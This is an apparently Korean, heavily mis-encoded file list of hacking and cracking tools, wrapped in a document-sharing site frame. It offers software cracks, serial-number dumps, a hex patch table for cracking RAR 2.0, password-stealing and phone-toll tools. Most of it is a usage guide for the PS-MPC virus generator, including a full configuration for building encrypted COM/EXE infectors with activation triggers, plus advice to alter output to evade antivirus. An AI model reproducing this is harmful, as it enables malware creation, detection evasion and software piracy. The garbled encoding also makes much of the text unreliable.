Anda di halaman 1dari 6

´ÙÀ½Àº Á¦°¡ Á¦°øÇص帰 °¢Á¾ ÀڗáµéÁß ºñÁßÀÖ´Â Áß¿äÇÑ Àڗῡ ´ëÇÑ ¼³¸í°ú °£´ÜÇÑ

»ç¿ë¹ý µéÀÔ´Ï´Ù.
¿ä±¸ÇϽô ºÐµéÀÌ ¸¹¾Æ Æ÷ÇÔ½ÃÄ×À¸´Ï Âü°í¹Ù¶ø´Ï´Ù.
* ¿©±â¼ ÀϺÎÀڗáµéÀº º‾°æÀÌ µÈ°Íµµ ÀÖÀ¸´Ï ¿©—‾ºÐÁß ¸î¸îºÐÀº
½ÇÁ¦ ¹ÞÀº Àڗῡ¼ Ãß°¡/º‾°æµÈ°Ô ÀÖÀ»¼ö ÀÖÀ¸´Ï Âø¿À¾øÀ¸½Ã±â
¹Ù¶ø´Ï´Ù.
ÀÌÁß¿¡´Â Á¦°¡ °³ÀÎÀûÀ¸—Î °¡Áö°íÀÖ´Â °Íµµ ÀÖÀ¸´Ï °øºÎ¿¡ ²À ÇÊ¿äÇÏ´Ù°í
»ý°¢µÇ´Â°Ô ÀÖÀ½ ¿äûÇÏ½Ã¸é µå¸±¼öµµ ÀÖ½À´Ï´Ù.
< ¹ÙÀ̗‾½º¿Í ¹é½Å >
PS-MPC À‾¸íÇÑ ¹ÙÀ̗‾½º Á¦Á¶±â.¼³¸íÀº º¸°°Á¿¡ Æ÷ÇÔ½ÃÄ×À½
VACCINE.ARJ ¸î¸î ¹é½ÅÀÇ ¼Ò½º°¡ Æ÷ÇԵǾú½À´Ï´Ù.

< À‾Æ¿¸®Æ¼ >


UUEXE540.ZIP TEXT<->BINȍÀÏ ±³È‾±âÀÔ´Ï´Ù
; °Ô½ÃÆÇ¿¡ °¡²û ÀÌ»óÇÑ ¹®ÀÚµéÀÌ ¾²¿©Áø°Ô ¿Ã¶ó¿Ã¶§°¡ ÀÖÀ»°Ì´Ï´Ù.
Àڗá½Ç¿¡ µî—ÏÇϱâ Èûµç(¾à°£ ºÒ¹ýÀûÀÎ Àڗá,½Å¼ÓÀ» ¿äÇÒ )¶§ »ç¿ëµéÀ»¸¹ÀÌÇÏÁÒ
¹ÙÀ̳ʸ®¸¦ TEXT—Î ¹Ù²Ù¾î °Ô½ÃÆÇ¿¡ ¿Ã¸±¶§, UUENCODE ȍÀϸí.EXE Çϸé XXX.UUE
—Î µÇ¸ç UUE—Î µÈ ÆÄÀÏÀ» °Ô½ÃÆÇ¿¡ ¿Ã¸®¸é µË´Ï´Ù.
¹Ý´ë—Î °Ô½ÃÆÇ¿¡¼ ¹ÞÀº UUE¸¦ ´Ù½Ã ¹ÙÀ̳ʸ®—Î Ç® ´Â,UUDECODE XXX.UUE Çϸé
¿ø—¡ÀÇ XXX.EXE°¡ ³ª¿À´Â °ÍÀÔ´Ï´Ù. ÀÌ°ÍÀº »ó´çÈ÷ À‾¿ëÇÏ´Ï Àß ¾²½Ã±æ...
JUMIN.ARJ Áֹεî—ϹøÈ£ Á¶È¸±â
; ³ª¿ìÀÇ ÇϾḾ´Ô²²¼ Á¦ÀÛÇؼ Á¦°øÇØÁֽŠ°ÍÀÔ´Ï´Ù.
±âÁ¸ ¼Ò½º¿¡ ¹®Á¦°¡ Àִٴ°ÍÀ» ÁöÀûÇØÁּż °íÃÄÁÖ½ÅÁ¡ °¨»çÇÏ°Ô»ý°¢ÇÕ´Ï´Ù.
BCTU BCTU´Â ÇöÀç 1X.00 ¹öÀü±îÁö Á¦À۵Ǿú½À´Ï´Ù.
; ¹°—Ð BCTU´Â È®ÀεȹٗΠ°¡Â¥ÀÔ´Ï´Ù. Àüȍºñ¸¦ ÁÙ¿©ÁÖÁö ¾Ê½À´Ï´Ù.
ÇöȤµÇÁö ¸¶½Ã°í, ´ÜÁö À̗±°ÍÀÌ Àִٴ°͸¸ ¾Ë¾ÆµÎ½Ã±â¸¦...
BOX BOX´Â ÁøÂ¥ Àüȍºñ¸¦ ³»Áö ¾Ê°Ô ÇØÁÖ´Â ÇÁ—αח¥ÀÔ´Ï´Ù.
; ´Ü, ¿ì¸®³ª¶ó¿¡¼ »ç¿ëÇÏ´Â Àüȍ±³È‾±â´Â ¹Ì±¹°ú Ʋ—Á ¾ÈÅëÇÕ´Ï´Ù.
¹Ì±¹³»¿¡¼µµ ÀÌÁ¦ BOX´Â ½Ã°ñÀ̳ª ÅëÇÑ´Ù°í ÇÏ´õ±º¿ä. ±â´ë¸¶½Ã±æ~

< ¶ô°ú Å©—¢ & ÆÐÄ¡ >


EUN-CK.COM ÀºÇÏ¿µ¿õÀü¼³ 4EX ¾ÏÈ£ ±úÁÝ´Ï´Ù.
INSTALL.RAR ¹é½Å V3 Á¤½Ä µî—ÏÆÇ
; ½ÇÇàÇÏ¸é µî—ϹøÈ£¸¦ ¿ä±¸ÇÏ°Ô µÇ´Âµ¥ À̶§ ÀÓÀÇÀÇ ¼ýÀÚ¸¦ ÁöÁ¤ÇÑ´Ù.
C-LH25.ARJ µî´ë 2.5 Á¤½Äµî—Ï Å©—¢ÀÔ´Ï´Ù.
mdir3-crk.arj Mdir-III Å©—¢ 2.5~2.70 ±îÁöÀÇ ¸ðÀ½Áý
; M3V270-C.ZIP ÀÌ °¡Àå ¹«³Çϸç,MSET.COM À» ½ÇÇàÇÏ°í µî—ϹøÈ£¸¦ ÀԗÂÇÒ½Ã
M2700-0000-0000-0000À¸—Î ³Ö¾îµµ µË´Ï´Ù.
RC.ARJ RAWCOPY ´Â °¢Á¾ °ÔÀÓÀÇ ¾ÏÈ£¸¦ ±úÁÖ´Â ÇÁ—αח¥ÀÔ´Ï´Ù
NEVLOCK.ARJ ³×¹ö¶ô ÀÔ´Ï´Ù. —οìÄ«ÇÇ Ã³—³ °ÔÀÓ¾ÏÈ£¸¦ ±úÁÖÁÒ.
DATECRCK.RAR ½Ã½ºÅÛÀÇ ³‾Â¥—Î ¹Ù²Ù¾î¼ ³‾Â¥Á¦ÇÑ ÇÁ—αח¥°°Àº°ÍÀ»
»ç¿ëÇϴµ¥ ÀüÇô ÁöÀåÀÌ ¾ø°Ô ÇØÁÝ´Ï´Ù. MOVEDATEº¸´Ù °³¼±µÊ
GW.ARJ °ÔÀÓÀ§ÀÚµå´Â Àß ¾Æ½Ç°Ì´Ï´Ù. ¹öÀü 32±îÁö ³ª¿Ô´Ù´Â±º¿ä.
; ¾Æ½±°Ôµµ Àú¿¡°Ô´Â 30Á¤½Ä¹Û¿¡ ¾ø³×¿ä. ÃֽŹöÀü±¸Çϸé Á¦°øÇÏÁÒ.
ARJKEY.COM ARJ¸¦ Á¤½ÄÀ¸—Î ¸¸µé¾îÁÝ´Ï´Ù.
Q40.RAR À‾¸íÇÑ Q ¿¡µðÅÍ ÆÐÄ¡ÀÔ´Ï´Ù.
UNPASS.COM ¹ÙÀÌ¿À½º ¿¡ °É¸° ¾ÏÈ£¸¦ ±úÁÝ´Ï´Ù.
UX.COM ½ÇÇà¾ÐÃàµÈ ÆÄÀϵéÀ» Á¤»óÀûÀ¸—Î Ç®¾îÁÝ´Ï´Ù.
; ¿ª¾î¼ÀºíÀ» ÇÒ°æ¿ì Á֗Π¾²ÀÌ°Ô µË´Ï´Ù.
EVER_CR.COM ¿¡¹ö¶ôÀ» Ǭ´Ù°í ÇÏÁö¸¸ ±â´ë´Â ¾ÈÇÔ.
B18UP È£½ºÆ® °õÁÖÀÎÀÇ ÆÐÄ¡¶ó³ª.. ¹¹¶ó³ª...
COPYIIPC ¶ôÀ» ±úÁشٴ ´ëÇ¥Àû "Ä«ÇǶóÀÌÆ®"ÀÔ´Ï´Ù.
FREEZE.LZH ½Ã½ºÅÛÀÇ ½Ã°£À» Á¤Áö½Ãŵ´Ï´Ù.
; ½Ã°£ÀÌ Á¤ÁöµÇ¸é ¾îµð¿¡ ÁÁÀ»Áö »ý°¢ÇØ º¸½Ã±æ...
PASSPY.ZIP ¾ÏÈ£¸¦ ¾Ë¾Æ³½´Ù´Â ´Ù¼Ò Ȳ´çÇÑ ÇÁ—αח¥ÀÌÁÒ.
; ¾ÏÈ£¸¦ ¾Ë¾Æ³»´Â ¹æ½ÄÀ̶õ°Ô ´Ù¸¥ »ç¶÷ ÄÄ¿¡¼ ½ÇÇà½ÃÄѼ ÀÎÅ͗´Æ®¸¦
°¡—Îä Ç×ÎÇÇ¿¡ ÀúÀåÇѴٴ Ȳ´çÇÑ ¼³Á¤Àε¥ À̗±°Å´Â ¾Æ¹«Â¦¿¡µµ
¾µ¸ð¾ø½À´Ï´Ù. Ä£±¸ ¾ÏÈ£¾Ë¾Æ³¾¶§ ¾´´Ù¸é ¸ô¶óµµ...
REGISTER.ARJ µî—ϹøÈ£¸¦ ¸ð¾Æ³õÀº°ÍÀÔ´Ï´Ù.
; À̾߱â,ARJ,DCF,ZMODEM,ZIP,TBAV,WWP,WINZIP,GWS µî..
ÀÌ¿Ü¿¡ ¼ö¹é°¡ÁöÀÇ ÇÁ—αח¥ÀÇ µî—ϹøÈ£°¡ ´ã±ä ÅؽºÆ®¸¦ Á¦°øÇÕ´Ï´Ù.
¹°—Ð ¸î¸î ºÐÀº °¡Áö°í°è½ÅºÐµµÀÖ°ÚÁö¸¸ ¾øÀ¸½Å ºÐÀ» À§ÇØ µå¸³´Ï´Ù.
Ãß°¡—Î Áß¿äÇÑ Å©—¢¿¡ ´ëÇÑ ºÎºÐµµ ÀÖÀ¸´Ï Âü°íÇϽñæ...
CRACK.ARJ ȍÀϗΠµÇ¾îÀÖ½À´Ï´Ù.
RAR 2.0ÀÇ °æ¿ì Á¤½Äµî—ÏÆÇÀ» ¸¸µé±âÀ§ÇÑ ¹æ¹ýÀÔ´Ï´Ù.
ÃÖ±Ù¿¡ RAR 2.0¿¡¼ ¾ÐÃàµÈ°ÍÀÇ °æ¿ì ±×Àü¹öÀü¿¡¼ Ç®¼ö°¡ ¾ø´õ±º¿ä.
À̹ø±âȸ¿¡ ´Ùµé 2.0À¸—Î ¹Ù²Ù´Â°Ô ÁÁÀ»µíÇÕ´Ï´Ù.
¦£¦¡¦¡¦¨¦¡¦¡¦¡¦¡¦¡¦¡¦¨¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¤
¦¢Sec ¦¢Hex ¦¢ ASCII ¦¢
¦§¦¡¦¡¦«¦¡¦¡¦¡¦¡¦¡¦¡¦«¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦©
¦¢185 ¦¢307H ¦¢ 75 ¡æ 74 ¦¢
¦¢187 ¦¢187H ¦¢ 75 ¡æ EB ¦¢
¦¢187 ¦¢497H , 498H ¦¢ 75 ¡æ 90 , 3B ¡æ 90 ¦¢
¦¢187 ¦¢503H , 504H ¦¢ 75 ¡æ 90 , 35 ¡æ 90 ¦¢
¦¢194 ¦¢389H ¦¢ 74 ¡æ EB ¦¢
¦¢239 ¦¢036H ¦¢ 74 ¡æ 75 ¦¢
¦¢255 ¦¢472H ¦¢ 75 ¡æ EB ¦¢
¦¦¦¡¦¡¦ª¦¡¦¡¦¡¦¡¦¡¦¡¦ª¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¥

PS-MPC (The Phalcon/Skism Mass Produced Code Generator)


PS-MPC ´Â ¹Ì±¹ÀÇ ¹ÙÀ̗‾½º Á¦À۱חìÀÎ ÆÓÄÜ ½ºÅ´Áî¿¡¼ ¸¸µç°ÍÀÔ´Ï´Ù
Ãʺ¸ÀÚ¸¦ À§ÇØ Á¦ÀÛµÈ ¹ÙÀ̗‾½º-Á¦Á¶±â ÀÌÁÒ.
ÀÌ¿Ü¿¡µµ ¸î°¡Áö ´Ù¸¥ ÇüÅÂÀÇ Á¦Á¶±â°¡ Á¸ÀçÇÕ´Ï´Ù¸¸ ´ëÇ¥ÀûÀΰÍÀ¸—Î
ÀÌ°ÍÀ» ¼Ò°³ÇÕ´Ï´Ù.
¹ÙÀ̗‾½º¸¦ ¸¸µé±âÀ§ÇØ ¾î¼Àºí¸®¸¦ °øºÎÇÏ°í ÈûµéÀ̴°ͺ¸´Ù´Â
¹ÙÀ̗‾½ºÀÇ ±âº»ÀûÀÎ —çƾµé—Î À̗ç¾îÁø ps-mpc °°Àº Á¦ÀÛ±â—Î
¸¸µå´Â°ÍÀÌ ÈξÀ ºü¸£±â ¶§¹®ÀÌÁÒ.
¿©—‾ºÐµéÀº ÀÏ´Ü ÀÌ°ÍÀ¸—Î ¹ÙÀ̗‾½ºÀÇ ±âº»ÀûÀÎ —çƾµéÀº ÀÌÇØÇϽñâ
¹Ù¶ø´Ï´Ù.
µÎ²¨¿î ¾î¼Àºí¸® Ã¥ Çѱdzõ°í ÂüÁ¶ÇØ°¡¸ç ÄÚµùÇÏ¸é ¾öû³ª°Ô ÀÀ¿ëÇÒ¼ö
µµ ÀÖ½À´Ï´Ù.
Âü°í—Î ÀÌ ÇÁ—αח¥Àº ºñ»óÁÖÇü¸¸ ¸¸µé¾î ÁÝ´Ï´Ù.
ps-mpcÀÇ »ç¿ë¹ýÀº CFG ÆÄÀÏÀ» ¿¡µðÅ͗Π¹Ù²Ù¸é µÇ´Â°ÍÀÔ´Ï´Ù.
ÇöÀç ±¹³»¿¡ ¹ß°ßµÈ ¹ÙÀ̗‾½º—δ PS-MPC.Generix ¶ó´Â ¹ÙÀ̗‾½º°¡ ÀÖ½À´Ï´Ù.
¹é½ÅÀ¸—Î üũÇÏ´Ï °É¸®´õ±º¿ä. ÀÀ¿ëÇϽǺÐÀº ¶â¾î°íÄ¡Á®¼ ¾È°É¸®°Ô Çغ¸¼¼¿ä.
³¡À¸—Î ÄÄÆÄÀÏÀº MASMÀº ¾ÈµÇ°í ¿À—ÎÁö TASM ¸¸ µË´Ï´Ù.
¾Æ—¡¿Í. °°ÀÌ ½ÇÇàÇÏ¸é ³ª¿À°ÔµÇ´Â ASMȍÀÏÀ» TASMÀ¸—Î ÄÄÆÄÀÏ ÇϽøéµË´Ï´Ù.
Àü¹ø Á¦ ÇϵåÆøÆÄ »ç°ÇÀÌÈÄ Àú¿¡°ÔÀÖ´ø TASMÀÌ Áö¿öÁ®¼ Á¦°øÇص帱¼ö
¾ø±º¿ä.Á¦°¡ ¿¹Àü¿¡º¸³»µå¸° TASMÀÌ Àְųª °¡Áö°í°è½ÅºÐÀº Á¦°Ôµµ
µå¸®¸é Á¦°¡ ÇÊ¿ä—ÎÇÏ´Â ºÐµé²¾ µå¸®ÁÒ.
C:\XXX>PS-MPC TEST.CFG ¶ó°í ÀԗÂÇϸé TEST.ASM ÀÌ »ý¼ºµË´Ï´Ù.

´ÙÀ½Àº *.CFG ȍÀÏ¿¡ µé¾îÀÖ´Â ³»¿ëµéÀÔ´Ï´Ù.


À̰͵éÀ» ¿¡µðÅ͗ΠÆíÁýÇϼż °íÄ¡±â¸¸ ÇÏ¸é µË´Ï´Ù.
; FILE: SKELETON.CFG <-ȍÀÏÀ̸§ÀÔ´Ï´Ù.
; Skeleton configuration file for PS-MPC version 0.90á
; Lines beginning with semicolons denote comments
; Required parameters:
; Filename = <string>
; This is the filename to be generated by PS-MPC as the source code file.
; ¼Ò½º—Î Ãâ—嵃 ÆÄÀÏ À̸§
Filename = target.asm
; Infect = (C,E)
; COM, EXE
; Note: You can mix the two, a la "Infect = C,E" Do not use a space to
; deliminate the two parameters.
; °¨¿°´ë»ó C ¸¸Çϸé COM ¸¸ °¨¿°,E —Î Çϸé EXEµµ °¨¿°µÇ°ÚÁÒ.
Infect = C,E
; Optional parameters - Defaults are shown in square brackets
; Traversal = <N,D>
; ([None], Dot Dot)
; If None is specified, then only the files in the current directory will be
; infected. If Dot dot is specified, then files in the current directory and
; subdirectories below the current will be infected.
; »óÀ§—Î À̵¿ÇÒ °ÍÀΰ¡? ÇöÀç µð—ºÅ丮¸¸ °¨¿°½Ãų°æ¿ì ÆÛÁö±â°¡ °ï¶õÇϹǗΠY —Î
; ÁöÁ¤ÇÏ´Â °ÍÀÌ ÁÁ´Ù.
Traversal = N
; Encrypted = <Y,N>
; (Yes, [No])
; Only turn off encryption if you wish to limit the size of the virus.
; ¹ÙÀ̗‾½º ¾Ïȣȍ. TV ÀÇ °æ¿ì ¾Ïȣȍ°¡ ¾ÈµÈ ¹ÙÀ̗‾½º¸¸ PS-MPC º‾ÇüÀ¸—Î Áø´Ü
; ÇÑ´Ù.
Encryption = Y
; IDWord = XX
; ([ ],XX)
; The IDWord consists of two characters which are used to identify already
; infected EXE files. This line is not needed in COM-only infectors. Do
; not use an apostrophe or the source code will not assemble properly.
; EXE ÆÄÀÏ ½ÇÇàÀÎÁö °Ë»çÇÒ¶§ »ç¿ëÇÏ´Â °ªÀ¸—Î ½ºÅØ°ªÀÌ µÈ´Ù.
IDWord = DA
; MinSize = #
; (A,[0]..65535)
; MinSize is used only in the infection of COM files. Files under MinSize
; bytes are not infected. MinSize = 0 turns off this option. MinSize = A
; indicates use of the virus's effective length as the minimum size. This
; line is ignored in EXE-specific infectors.
; °¨¿°½Ãų ÆÄÀÏÀÇ ÃÖ¼ÒÅ©±â.
MinSize = 0
; MaxSize = #
; (A,[0]..65535)
; MaxSize is used only in the infection of COM files. Files above MaxSize
; bytes are not infected. MaxSize = 0 turns off this option. MaxSize = A
; indicates automatic calculation of maximum size. This line is not needed
; in EXE-only infectors.
; °¨¿°½Ãų ÆÄÀÏÀÇ ÃÖ´ëÅ©±â
MaxSize = A
; Infections = #
; ([0]..255)
; Infections is an optional counter limiting the number of infections per run
; of the virus to a specific number. Infections = 0 disables this option.
; °¨¿°°¹¼ö
Infections = 0
; ErrorHandler = <Y,N>
; (Yes, [No])
; ErrorHandler selects if you wish to include a short critical error handler
; in the virus. This handler prevents Abort, Retry, Fail messages by taking
; over the critical error interrupt. Attempted infection of files on write-
; protected diskettes will not generate an error if this option is set.
; ¿¡—‾Çîµé (Int 24h) ¸¦ °¡—Îç°ÍÀΰ¡? N ÇÏ¸é ¾²±â ¹æÁö ÅÇÀÌ ºÙÀº Ç×ÎÇÇ¿¡¼
; µð½ºÅ© ¿¡—‾°¡ ³´Ù.
ErrorHandler = Y
; CommandCom = <Y,N>
; (Yes, [No])
; This flag indicates whether you wish the virus to infect COMMAND.COM
; 'Yes' turns off the check for COMMAND.COM, thus saving space.
; COMMAND.COM À» °¨¿°¿¡¼ Á¦¿ÜÇÒ°ÍÀΰ¡? (Yes Çϸé COMMAND.COM µµ °¨¿°.
; ÇÏÁö¸¸, COMMAND.COM ¿¡ °¨¿°µÇ¸é ºÎÆÃÀÌ ¾ÈµÈ´Ù.
CommandCom = N
; VirusName = <string>
; The only limitation to the string is that you may not use both the single
; and double quotes together in the string, i.e. the string B'li"p is not
; legal.
; ¹ÙÀ̗‾½ºÀ̸§ [] ¾È¿¡ ½áÁÖ¸é µÈ´Ù.
VirusName = [Skeleton]
; AuthorName = <string>
; The same constraints apply to AuthorName.
; Á¦ÀÛÀÚ À̸§
AuthorName = Deke
; AllowZero = <Y,N>
; (Yes, [No])
; This flags whether the virus will allow an encryption value of 0, which
; would effectively leave it in an unencrypted state. 'Yes' disables the
; zero check, thereby shortening code length.
; ¾ÏȣŰÁß 0ÀÌ¸é ¾Ïȣȍ ¾ÈµÈ °ªÀÌ µÇ¹Ç—Î 0 Àº °¨¿°Å°—Î »ç¿ëÇÏÁö ¾ÊÀ»°ÍÀΰ¡?
; Y ¸é 0 µµ Çã¶ôÇÑ´Ù.
AllowZero = N
; Activation Conditions
; All conditions must be satisfied for activation to occur
; Æ‾Á¤ÇÒ¶§¸¸ ÀÛµ¿ÇÒ°ÍÀΰ¡?
; Always = <Y,N>
; (Yes, [No])
; This flags whether the virus always activates, although I can't imagine a
; useful virus that does so.
; Always = N
; IfMonth = #
; <1..12><-,+>
; Activate if the month is equal to the specified number. Adding a minus sign
; after the month indicates activation before or during the specified month.
; Adding a plus sign after the month indicates activation during or after the
; specified month.
; IfMonth = 11+ ; Activate in either November or December
; IfDay = #
; <1..31><-,+>
; Activate if the date is on a certain date Adding a minus sign after the day
; indicates activation on or before that day. Similarly, adding a plus sign
; indicates activation on or after that day. Note: the program does not check
; to see if the number inputted is a valid date. For example, combining
; IfMonth=2 and IfDay=30+ will NOT result in an error, although the virus will
; clearly never activate.
; IfDay = 15+ ; Activate after the fifteenth of the month
; IfYear = #
; <0..65535><-,+>
; Activate during a certain year or years. Don't be stupid and put a
; ridiculous year such as 1-.
; IfYear = 1993+ ; Activate after 1993
; IfDOW = #
; <0..6><-,+>
; 0 = Sunday, 1 = Monday, etc.
; Activate on, before, or after a particular day of the week.
; IfDOW = 0 ; Activate only on Sundays
; IfMonthDay = #,#
; <#,#><-,+>
; Activate on, before, or after a particular day of the year. This differs
; from the combination of IfMonth and IfDay.
; IfMonthDay = 5,9+ ; Activate only after May 9th
; compare to:
; IfMonth = 5+ ; Activate in May through December, but only if the
; IfDay = 9+ ; day is on or after the 8th. July 1st is NOT an
; activation date
; IfHour = #
; <0..23><-,+>
; This should be self-explanatory at this point.
; IfHour = 12 ; Activate any time from 12 noon -> 1 P.M.
; IfMinute = #
; <0..59><-,+>
; Duh.
; IfMinute = 30+
; IfSecond = #
; <0..59><-,+> ;; check 0
; This is somewhat useless, in my estimation
; IfSecond = 30+
; Percentage = #
; <1..99>
; This uses the 1/100 second counter as a random number. If the counter is
; less than the percentage, then the virus will activate.
; Percentage = 50 ; Even odds

Anda mungkin juga menyukai